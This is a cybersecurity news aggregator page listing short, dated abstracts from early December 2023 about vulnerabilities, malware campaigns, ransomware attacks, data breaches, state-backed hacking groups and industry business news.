Abstract Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the constantly evolving threat landscape. Importance of threat intelligence in the cybersecurity ecosystem Threat intelligence is a crucial part of any cybersecurity ecosystem. A robust cyber threat intelligence program helps organizations identify, analyze, and prevent security breaches. Threat intelligence is important to modern cyber security practice for several reasons: Proactive defense:  Organizations can enhance their overall cyber resilience by integrating threat intelligence into security practices to address the specific threats and risks that are relevant to their industry, geolocation, or technology stack. Threat intelligence allows organizations to identify potential threats in advanc

The Hacker News

December 7, 2023 – Vulnerabilities

Apple and Some Linux Distros are Open to Bluetooth Attack Full Text

Abstract A Bluetooth authentication bypass vulnerability, tracked as CVE-2023-45866, allows attackers to connect to Apple, Android, and Linux devices and inject keystrokes to run arbitrary commands.

Cyware

December 07, 2023 – Privacy

Governments May Spy on You by Requesting Push Notifications from Apple and Google Full Text

Abstract Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden. "Push notifications are alerts sent by phone apps to users' smartphones," Wyden  said . "These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments." Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments. When mobile apps for Android and iOS send push notifications to users' devices, they are ro

The Hacker News

December 7, 2023 – APT

TA422’s Dedicated Exploitation Loop—the Same Week After Week Full Text

Abstract Russian APT group TA422 has been actively exploiting patched vulnerabilities to target government, aerospace, education, finance, manufacturing, and technology sectors in Europe and North America.

Cyware

December 07, 2023 – Malware

New Stealthy ‘Krasue’ Linux Trojan Targeting Telecom Firms in Thailand Full Text

Abstract A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand, used by threat actors to maintain covert access to victim networks since at least 2021. Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News. The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is  The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty. This has raised the possibility that Krasue is eithe

The Hacker News

December 7, 2023 – Attack

Schools in Maine, Indiana and Georgia Contend Ransomware Attacks Full Text

Abstract The Henry County Schools district in Georgia and the Hermon School Department in Maine are among the latest victims, with the former experiencing a ransomware attack and the latter having outdated software vulnerabilities exploited.

Cyware

December 6, 2023 – Criminals

North Korean Andariel Hackers Steal South Korean Anti-Aircraft Data Full Text

Abstract Seoul police have seized the servers and virtual asset exchanges used by Andariel, arrested the person involved in transferring ransomware funds, and advised organizations to strengthen their cybersecurity measures to prevent future attacks.

Cyware

December 06, 2023 – Vulnerabilities

Alert: Threat Actors Can Leverage AWS STS to Infiltrate Cloud Accounts Full Text

Abstract Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks. The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth  said  in a Tuesday analysis. AWS STS is a  web service  that enables users to request temporary, limited-privilege credentials for users to access AWS resources without needing to create an AWS identity. These STS tokens can be valid  anywhere from 15 minutes to 36 hours . Threat actors can steal long-term IAM tokens through a variety of methods like malware infections, publicly exposed credentials, and phishing emails, subsequently using them to determine roles and privileges associated with those tokens via API calls. "Depending on the token's permission level, adversaries may also be able to use it to create additional IAM users with long-term AKIA tokens to e

The Hacker News

December 6, 2023 – Business

Mine Digs up $30M for Its No-Code Approach to Vetting Data Privacy Full Text

Abstract Battery Ventures and PayPal Ventures are co-leading this round, with participation also from Nationwide Ventures and all its previous backers, including Saban Ventures, Gradient Ventures, MassMutual Ventures, and Headline Ventures.

Cyware

December 06, 2023 – General

New Report: Unveiling the Threat of Malicious Browser Extensions Full Text

Abstract Compromising the browser is a high-return target for adversaries. Browser extensions, which are small software modules that are added to the browser and can enhance browsing experiences, have become a popular browser attack vector. This is because they are widely adopted among users and can easily turn malicious through developer actions or attacks on legitimate extensions. Recent incidents like  DataSpii  and the  Nigelthorn  malware attack have exposed the extent of damage that malicious extensions can inflict. In both cases, users innocently installed extensions that compromised their privacy and security. The underlying issue lies in the permissions granted to extensions. These permissions, often excessive and lacking granularity, allow attackers to exploit them. What can organizations do to protect themselves from the risks of browser extensions without barring them from use altogether (an act that would be nearly impossible to enforce)?  A new report by LayerX, "Unveiling the

The Hacker News

December 6, 2023 – Vulnerabilities

Post-Exploitation Tampering Technique can be Used to Simulate Fake Lockdown Mode on iPhones Full Text

Abstract Hackers can manipulate Lockdown Mode to provide visual cues of activation without actually implementing any protections. Lockdown Mode should not be relied upon as a comprehensive security measure and users should be aware of its limitations.

Cyware

December 06, 2023 – Vulnerabilities

Sierra:21 - Flaws in Sierra Wireless Routers Expose Critical Sectors to Cyber Attacks Full Text

Abstract A collection of 21 security flaws has been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS. Collectively tracked as Sierra:21, the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according to Forescout Vedere Labs. A majority of these devices are located in the U.S., Canada, Australia, France, and Thailand. "These vulnerabilities may allow attackers to steal credentials, take control of a router by injecting malicious code, persist on the device and use it as an initial access point into critical networks," the industrial cybersecurity company said in a new analysis. Of the 21 vulnerabilities, one is rated critical, nine are rated high, and 11 are rated medium in severity. This includes remote code execution (RCE), cross-site scripting (XSS), denial-of-service (DoS), unauthori

The Hacker News

December 6, 2023 – Malware

SpyLoan Android Malware Targets Users in Southeast Asia, Africa, and Latin America Full Text

Abstract These apps trick users into providing sensitive personal and financial information, which is then used to blackmail them. The apps focus on users in Southeast Asia, Africa, and Latin America.

Cyware

December 06, 2023 – Education

Scaling Security Operations with Automation Full Text

Abstract In an increasingly complex and fast-paced digital landscape, organizations strive to protect themselves from various security threats. However, limited resources often hinder security teams when combatting these threats, making it difficult to keep up with the growing number of security incidents and alerts. Implementing automation throughout security operations helps security teams alleviate these challenges by streamlining repetitive tasks, reducing the risk of human error, and allowing them to focus on higher-value initiatives. While automation offers significant benefits, there is no foolproof method or process to guarantee success. Clear definitions, consistent implementation, and standardized processes are crucial for optimal results. Without guidelines, manual and time-consuming methods can undermine the effectiveness of automation.  This blog explores the challenges faced by security operations teams when implementing automation and the practical steps needed to build a stro

The Hacker News

December 06, 2023 – Government

Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a  high-severity Adobe ColdFusion vulnerability  by unidentified threat actors to gain initial access to government servers. "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA  said , adding an unnamed federal agency was targeted between June and July 2023. The shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, released on March 14, 2023, respectively. It was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being "exploited in the wild in very limited attacks."

The Hacker News

December 06, 2023 – Vulnerabilities

Atlassian Releases Critical Software Fixes to Prevent Remote Code Execution Full Text

Abstract Atlassian has released software fixes to address  four critical flaws  in its software that, if successfully exploited, could result in remote code execution. The list of vulnerabilities is below - CVE-2022-1471  (CVSS score: 9.8) - Deserialization vulnerability in  SnakeYAML library  that can lead to remote code execution in multiple products CVE-2023-22522  (CVSS score: 9.0) - Remote code execution vulnerability in Confluence Data Center and Confluence Server (affects all versions including and after 4.0.0) CVE-2023-22523  (CVSS score: 9.8) - Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server) CVE-2023-22524  (CVSS score: 9.6) - Remote code execution vulnerability in Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0) Atlassian described CVE-2023-22522 as a template injection flaw that allo

The Hacker News

December 5, 2023 – Attack

Florida Water Agency Latest to Confirm Cyber Incident as Feds Warn of Nation-State Attacks Full Text

Abstract The St. Johns River Water Management District in Florida has confirmed that it responded to a cyberattack last week, amid warnings from top cybersecurity agencies about foreign attacks on water utilities.

Cyware

December 05, 2023 – Vulnerabilities

Warning for iPhone Users: Experts Warn of Sneaky Fake Lockdown Mode Attack Full Text

Abstract A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks. The novel method, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause Lockdown Mode to be 'bypassed' when you trigger its activation." In other words, the goal is to implement Fake Lockdown Mode on a device that's compromised by an attacker through other means, such as unpatched security flaws that can trigger execution of arbitrary code. Lockdown Mode, introduced by Apple last year with iOS 16, is an enhanced security measure that aims to safeguard high-risk individuals from sophisticated digital threats such as mercenary spyware by minimizing the attack surface. What it doesn't do is prevent the execution of mali

The Hacker News

December 5, 2023 – Breach

Iran-Linked Hackers Claim to Leak Troves of Documents From Israeli Hospital Full Text

Abstract A hacker group allegedly linked to Iran, known as Malek Team, has claimed responsibility for a cyberattack on an Israeli hospital, resulting in the leak of thousands of medical records, including those of Israeli soldiers.

Cyware

December 05, 2023 – Disinformation

Russia’s AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany Full Text

Abstract The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts. These campaigns are designed to amplify content designed to undermine Ukraine as well as propagate anti-LGBTQ+ sentiment, U.S. military competence, and Germany's economic and social issues, according to a new report shared with The Hacker News. Doppelganger, described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency. Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives. The late

The Hacker News

December 5, 2023 – Breach

International Dog Breeding Organization WALA Exposes 25GB of Pet Owners’ Data Full Text

Abstract The breach exposes the global customer base of WALA to potential threats like phishing attacks and financial scams, emphasizing the need for affected parties to monitor their financial accounts and implement additional security measures.

Cyware

December 05, 2023 – Education

Generative AI Security: Preventing Microsoft Copilot Data Exposure Full Text

Abstract Microsoft Copilot has been called one of the most powerful productivity tools on the planet. Copilot is an AI assistant that lives inside each of your Microsoft 365 apps — Word, Excel, PowerPoint, Teams, Outlook, and so on. Microsoft's dream is to take the drudgery out of daily work and let humans focus on being creative problem-solvers. What makes Copilot a different beast than ChatGPT and other AI tools is that it has access to everything you've ever worked on in 365. Copilot can instantly search and compile data from across your documents, presentations, email, calendar, notes, and contacts. And therein lies the problem for information security teams. Copilot can access all the sensitive data that a user can access, which is often far too much. On average, 10% of a company's M365 data is open to all employees. Copilot can also rapidly generate net new sensitive data that must be protected. Prior to the AI revolution, humans' ability to create and share data

The Hacker News

December 5, 2023 – Government

OPM Launches Cyber Rotational Program for Feds Full Text

Abstract The OPM has launched a new Federal Rotational Cyber Workforce Program, allowing cybersecurity employees in the federal government to apply for rotational opportunities at other agencies to enhance their skills and defend against evolving threats.

Cyware

December 05, 2023 – Vulnerabilities

15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack Full Text

Abstract New research has found that over 15,000 Go module repositories on GitHub are vulnerable to an attack called repojacking. "More than 9,000 repositories are vulnerable to repojacking due to GitHub username changes," Jacob Baines, chief technology officer at VulnCheck, said in a report shared with The Hacker News. "More than 6,000 repositories were vulnerable to repojacking due to account deletion." Collectively, these repositories account for no less than 800,000 Go module-versions. Repojacking, a portmanteau of "repository" and "hijacking," is an attack technique that allows a bad actor to take advantage of account username changes and deletions to create a repository with the same name and the pre-existing username to stage open-source software supply chain attacks. Earlier this June, cloud security firm Aqua revealed that millions of software repositories on GitHub are likely vulnerable to the threat, urging organizations that undergo

The Hacker News

December 5, 2023 – Attack

Accounting Software Giant Tipalti Investigating Ransomware Attack Full Text

Abstract ALPHV, a prolific ransomware group, allegedly gained persistent access to multiple Tipalti systems and stole over 265GB of data, with claims of insider involvement in the attacks.

Cyware

December 05, 2023 – Attack

New Threat Actor ‘AeroBlade’ Emerges in Espionage Attack on U.S. Aerospace Full Text

Abstract A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission. The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as AeroBlade. Its origin is currently unknown and it's not clear if the attack was successful. "The actor used spear-phishing as a delivery mechanism: A weaponized document, sent as an email attachment, contains an embedded remote template injection technique and a malicious VBA macro code, to deliver the next stage to the final payload execution," the company said in an analysis published last week. The network infrastructure used for the attack is said to have gone live around September 2022, with the offensive phase of the intrusion occurring nearly a year later in July 2023, but not before the adversary took steps to improvise its toolset to make it more stealthy in the intervening time perio

The Hacker News

December 5, 2023 – Phishing

Hershey phishes! Crooks snarf chocolate lovers’ creds Full Text

Abstract The phishing emails were sent to employees in early September and allowed the criminals to steal a range of personal data, including names, health and medical information, credit card numbers, and online account credentials.

Cyware

December 05, 2023 – APT

Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability Full Text

Abstract Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a now-patched critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, BlueDelta, Fancy Bear, FROZENLAKE, Iron Twilight, Sednit, Sofacy, and TA422. The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. The goal, according to the Polish Cyber Command (DKWOC), is to obtain unauthorized access to mailboxes belonging to public and private entities in the country. "In the next stage of malici

The Hacker News

December 4, 2023 – Policy and Law

Establishing New Rules for Cyber Warfare Full Text

Abstract The International Committee of the Red Cross (ICRC) has released a set of rules for civilian hackers involved in cyber conflicts. The rules aim to clarify the line between civilians and combatants in cyberspace during times of war.

Cyware

December 04, 2023 – Vulnerabilities

New BLUFFS Bluetooth Attack Exposes Devices to Adversary-in-the-Middle Attacks Full Text

Abstract New research has unearthed multiple novel attacks that break Bluetooth Classic's forward secrecy and future secrecy guarantees, resulting in adversary-in-the-middle (AitM) scenarios between two already connected peers. The issues, collectively named BLUFFS, impact Bluetooth Core Specification 4.2 through 5.4. They are tracked under the identifier CVE-2023-24023 (CVSS score: 6.8) and were responsibly disclosed in October 2022. The attacks "enable device impersonation and machine-in-the-middle across sessions by only compromising one session key," EURECOM researcher Daniele Antonioli said in a study published late last month. This is made possible by leveraging two new flaws in the Bluetooth standard's session key derivation mechanism that allow the derivation of the same key across sessions. While forward secrecy in key-agreement cryptographic protocols ensures that past communications are not revealed, even if the private keys to a particular exchange are re

The Hacker News

December 4, 2023 – Attack

BlackCat Ransomware Strikes Ho Chi Minh City Power Corporation Full Text

Abstract The ongoing attack spree by the BlackCat ransomware group extends beyond Vietnam Electricity, with social media platforms like Roblox and Twitch potentially being targeted next.

Cyware

December 04, 2023 – General

Make a Fresh Start for 2024: Clean Out Your User Inventory to Reduce SaaS Risk Full Text

Abstract As work ebbs with the typical end-of-year slowdown, now is a good time to review user roles and privileges and remove anyone who shouldn't have access as well as trim unnecessary permissions. In addition to saving some unnecessary license fees, a clean user inventory significantly enhances the security of your SaaS applications. From reducing risk to protecting against data leakage, here is how you can start the new year with a clean user list. How Offboarded Users Still Have Access to Your Apps When employees leave a company, they trigger a series of changes to backend systems in their wake. First, they are removed from the company's identity provider (IdP), which kicks off an automated workflow that deactivates their email and removes access to all internal systems. When enterprises use an SSO (single sign-on), these former employees lose access to any online properties – including SaaS applications – that require SSO for login. However, that doesn't mean that former employee

The Hacker News

December 4, 2023 – Breach

More Than 1,500 Hugging Face API Tokens Exposed, Major Projects Vulnerable Full Text

Abstract The exposed API tokens had write permissions, allowing attackers to modify files in account repositories and potentially manipulate existing models, posing a significant threat to organizations and their applications.

Cyware

December 04, 2023 – Botnet

New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices Full Text

Abstract Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices. The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach. "It's highly likely that by targeting MIPS, the P2PInfect developers intend to infect routers and IoT devices with the malware," security researcher Matt Muir said in a report shared with The Hacker News. P2PInfect, a Rust-based malware, was first disclosed back in July 2023, targeting unpatched Redis instances by exploiting a critical Lua sandbox escape vulnerability (CVE-2022-0543, CVSS score: 10.0) for initial access. A subsequent analysis from the cloud security firm in September revealed a surge in P2PInfect activity, coinciding with the release of iterative variants of the malware. The new artifacts, besides attempting to condu

The Hacker News

December 4, 2023 – Breach

DePauw University Warns of Data Breach as Ransomware Attacks on Colleges Surge Full Text

Abstract The attack on DePauw University was conducted by the Black Suit ransomware gang, highlighting the increasing trend of ransomware attacks targeting educational institutions.

Cyware

December 04, 2023 – Vulnerabilities

LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks Full Text

Abstract The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware. The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel Boot Guard, and other security technologies by design." Furthermore, they can be weaponized to bypass security solutions and deliver persistent malware to compromised systems during the boot phase by injecting a malicious logo image file into the EFI system partition. While the issues are not silicon-specific, meaning they impact both x86 and ARM-based devices, they are also UEFI and IBV-specific. The vulnerabilities comprise a heap-based buffer overflow flaw and an out-of-bounds read, details of which are expected to be made public later this week at the Black Hat Europe conference.

The Hacker News

December 4, 2023 – Malware

New Variant of P2Pinfect Targets MIPS Devices Including Routers and IoT Devices Full Text

Abstract The new variant includes updated evasion techniques, such as Virtual Machine detection, debugger detection, and anti-forensics measures on Linux hosts, making it more difficult for researchers to analyze.

Cyware

December 04, 2023 – Phishing

Microsoft Warns of Malvertising Scheme Spreading CACTUS Ransomware Full Text

Abstract Microsoft has warned of a new wave of CACTUS ransomware attacks that leverage malvertising lures to deploy DanaBot as an initial access vector. The DanaBot infections led to "hands-on-keyboard activity by ransomware operator Storm-0216 (Twisted Spider, UNC2198), culminating in the deployment of CACTUS ransomware," the Microsoft Threat Intelligence team said in a series of posts on X (formerly Twitter). DanaBot, tracked by the tech giant as Storm-1044, is a multi-functional tool along the lines of Emotet, TrickBot, QakBot, and IcedID that's capable of acting as a stealer and a point of entry for next-stage payloads. UNC2198, for its part, has been previously observed infecting endpoints with IcedID to deploy ransomware families such as Maze and Egregor, as detailed by Google-owned Mandiant in February 2021. Per Microsoft, the threat actor has also taken advantage of initial access provided by QakBot infections. The shift to DanaBot, therefore, is likely the resu

The Hacker News

December 4, 2023 – Breach

Astrology Website WeMystic Exposes Over 13 Million User Records Full Text

Abstract The astrology and spiritual content platform WeMystic exposed the sensitive data of its users, including names, email addresses, and dates of birth, due to an open and passwordless MongoDB database.

Cyware

December 4, 2023 – Education

Bridging the Gap Between Cloud vs On-Premise Security Full Text

Abstract It is crucial to maintain unified visibility, control, and management across both cloud-based and on-premise security measures to bridge the gap and create a comprehensive and future-proof security stack.

Cyware

December 4, 2023 – Attack

Update: New Relic Admits Attack on Staging Systems, User Accounts Full Text

Abstract Web tracking and analytics company New Relic has disclosed a cyberattack on its staging systems, which were compromised in mid-November by an unauthorized actor using stolen credentials and social engineering.

Cyware

December 2, 2023 – Outage

60 US Credit Unions Offline After Cloud Ransomware Infection Full Text

Abstract The affected IT provider, Ongoing Operations, was infiltrated through the Citrix Bleed vulnerability, emphasizing the importance of robust cybersecurity measures and patching vulnerabilities promptly.

Cyware

December 02, 2023 – Attack

Agent Racoon Backdoor Targets Organizations in Middle East, Africa, and U.S. Full Text

Abstract Organizations in the Middle East, Africa, and the U.S. have been targeted by an unknown threat actor to distribute a new backdoor called Agent Racoon. "This malware family is written using the .NET framework and leverages the domain name service (DNS) protocol to create a covert channel and provide different backdoor functionalities," Palo Alto Networks Unit 42 researcher Chema Garcia said in a Friday analysis. Targets of the attacks span various sectors such as education, real estate, retail, non-profits, telecom, and governments. The activity has not been attributed to a known threat actor, although it's assessed to be a nation-state aligned owing to the victimology pattern and the detection and defense evasion techniques used. The cybersecurity firm is tracking the cluster under the moniker CL-STA-0002. It's currently not clear how these organizations were breached, and when the attacks took place. Some of the other tools deployed by the adversary include

The Hacker News

December 2, 2023 – Ransomware

Expert Warns of Turtle macOS Ransomware Full Text

Abstract While the Turtle ransomware may not pose a significant risk to macOS users currently, its existence highlights the ongoing efforts by ransomware authors to target Apple devices.

Cyware

December 02, 2023 – Policy and Law

Russian Hacker Vladimir Dunaev Convicted for Creating TrickBot Malware Full Text

Abstract A Russian national has been found guilty in connection with his role in developing and deploying a malware known as TrickBot, the U.S. Department of Justice (DoJ) announced. Vladimir Dunaev, 40, was arrested in South Korea in September 2021 and extradited to the U.S. a month later. "Dunaev developed browser modifications and malicious tools that aided in credential harvesting and data mining from infected computers, facilitated and enhanced the remote access used by TrickBot actors, and created a program code to prevent the TrickBot malware from being detected by legitimate security software," the DoJ said. "During Dunaev's participation in the scheme, 10 victims in the Northern District of Ohio, including Avon schools and a North Canton real-estate company, were defrauded of more than $3.4 million via ransomware deployed by TrickBot." Dunaev, who pleaded guilty to committing computer fraud and identity theft and conspiracy to commit wire fraud and ban

The Hacker News

December 2, 2023 – Breach

Surgical Practice Notifying 437,400 Patients of Data Theft Full Text

Abstract Proliance Surgeons, a large Seattle-based surgical group, suffered a ransomware attack and data theft, potentially compromising the personal information of nearly 437,400 individuals.

Cyware

December 2, 2023 – Breach

Update: 23andMe Says Hackers Accessed ‘Significant Number’ of Files About Users’ Ancestry Full Text

Abstract Genetic testing company 23andMe experienced a data breach, with hackers accessing around 14,000 customer accounts and potentially compromising the personal information of other users connected to those accounts.

Cyware

December 01, 2023 – Malware

New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia Full Text

Abstract Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023. "Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday. Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components. Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery (TOAD), which involves calling a bogus call center to receive step-by-step instructions for running the app. A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of

The Hacker News

December 01, 2023 – Education

Qakbot Takedown Aftermath: Mitigations and Protecting Against Future Threats Full Text

Abstract The U.S. Department of Justice (DOJ) and the FBI recently collaborated in a multinational operation to dismantle the notorious Qakbot malware and botnet. While the operation was successful in disrupting this long-running threat, concerns have arisen as it appears that Qakbot may still pose a danger in a reduced form. This article discusses the aftermath of the takedown, provides mitigation strategies, and offers guidance on determining past infections. The Takedown and Its Limitations During the takedown operation, law enforcement secured court orders to remove Qakbot malware from infected devices remotely. It was discovered that the malware had infected a substantial number of devices, with 700,000 machines globally, including 200,000 computers in the U.S., being compromised at the time of the takedown. However, recent reports suggest that Qakbot is still active but in a diminished state. The absence of arrests during the takedown operation indicates that only the command-and-cont

The Hacker News

December 1, 2023 – Attack

XDSpy Hackers Attack Military-Industrial Companies in Russia Full Text

Abstract XDSpy has a history of targeting Russia's government, military, financial institutions, as well as energy, research, and mining companies, demonstrating a focus on strategic organizations in Eastern Europe.

Cyware

December 01, 2023 – Attack

Chinese Hackers Using SugarGh0st RAT to Target South Korea and Uzbekistan Full Text

Abstract A suspected Chinese-speaking threat actor has been attributed to a malicious campaign that targets the Uzbekistan Ministry of Foreign Affairs and South Korean users with a remote access trojan called SugarGh0st RAT. The activity, which commenced no later than August 2023, leverages two different infection sequences to deliver the malware, which is a customized variant of Gh0st RAT (aka Farfli). It comes with features to "facilitate the remote administration tasks as directed by the C2 and modified communication protocol based on the similarity of the command structure and the strings used in the code," Cisco Talos researchers Ashley Shen and Chetan Raghuprasad said. The attacks commence with a phishing email bearing decoy documents, opening which activates a multi-stage process that leads to the deployment of SugarGh0st RAT. The decoy documents are incorporated within a heavily obfuscated JavaScript dropper that's contained within a Windows Shortcut file embed

The Hacker News

December 1, 2023 – Vulnerabilities

Simple Hacking Technique can Extract ChatGPT Training Data Full Text

Abstract Researchers from Google DeepMind, Cornell University, and other institutions have discovered that the popular AI chatbot ChatGPT is susceptible to leaking data when prompted to repeat certain words.

Cyware

December 01, 2023 – Denial Of Service

Discover How Gcore Thwarted Powerful 1.1Tbps and 1.6Tbps DDoS Attacks Full Text

Abstract The most recent Gcore Radar report and its aftermath have highlighted a dramatic increase in DDoS attacks across multiple industries. At the beginning of 2023, the average strength of attacks reached 800 Gbps, but now, even a peak as high as 1.5+ Tbps is unsurprising. To try and break through Gcore's defenses, perpetrators made two attempts with two different strategies. Read on to discover what happened and learn how the security provider stopped the attackers in their tracks without affecting end users' experiences. Powerful DDoS Attacks In November 2023, one of Gcore's customers from the gaming industry was targeted by two massive DDoS attacks, peaking at 1.1 and 1.6 Tbps respectively. The attackers deployed various techniques in an unsuccessful attempt to compromise Gcore's protective mechanisms. Attack #1: 1.1 Tbps UDP-based DDoS In the first cyber assault, the attackers sent a barrage of UDP traffic to a target server, peaking at 1.1 Tbps. Two methods were employed:

The Hacker News

December 1, 2023 – Business

BlueVoyant Raises $140M, Buys Resilience Firm Conquest Cyber Full Text

Abstract The integration of BlueVoyant and Conquest Cyber will provide customers with more self-service capabilities and autonomous operations through the use of AI, machine learning, and virtual data lakes.

Cyware

December 1, 2023 – Attack

Hackers Use new Tool Set in Targeted Attacks Against Middle East, Africa and the US Full Text

Abstract A new set of tools, including a backdoor, a credential-stealing module, and a customized version of Mimikatz, has been used in targeted attacks against organizations in the Middle East, Africa, and the U.S.

Cyware
